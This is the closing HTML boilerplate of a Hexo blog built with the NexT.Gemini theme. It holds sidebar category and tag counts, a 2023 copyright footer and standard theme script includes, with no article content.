        </a>
      </div>
      <div class="site-state-item site-state-categories">
            <a href="/categories/">
          
        <span class="site-state-item-count">11</span>
        <span class="site-state-item-name">分类</span></a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>



      </div>

    </div>
  </aside>
  <div id="sidebar-dimmer"></div>


      </div>
    </main>

    <footer class="footer">
      <div class="footer-inner">
        

        

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2023</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">北极星上的稻草人</span>
</div>
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.org/" class="theme-link" rel="noopener" target="_blank">NexT.Gemini</a> 强力驱动
  </div>

        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>
</div>








      </div>
    </footer>
  </div>

  
  
  <script color='0,0,255' opacity='0.5' zIndex='-1' count='99' src="/lib/canvas-nest/canvas-nest.min.js"></script>
  <script src="/lib/anime.min.js"></script>
  <script src="/lib/velocity/velocity.min.js"></script>
  <script src="/lib/velocity/velocity.ui.min.js"></script>

<script src="/js/utils.js"></script>

<script src="/js/motion.js"></script>


<script src="/js/schemes/pisces.js"></script>


<script src="/js/next-boot.js"></script>




  















  

  


<!-- 页面动态背景 -->

<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>


</body>
</html>
<!-- 页面点击小红心 -->
<script type="text/javascript" src="/js/clicklove.js"></script>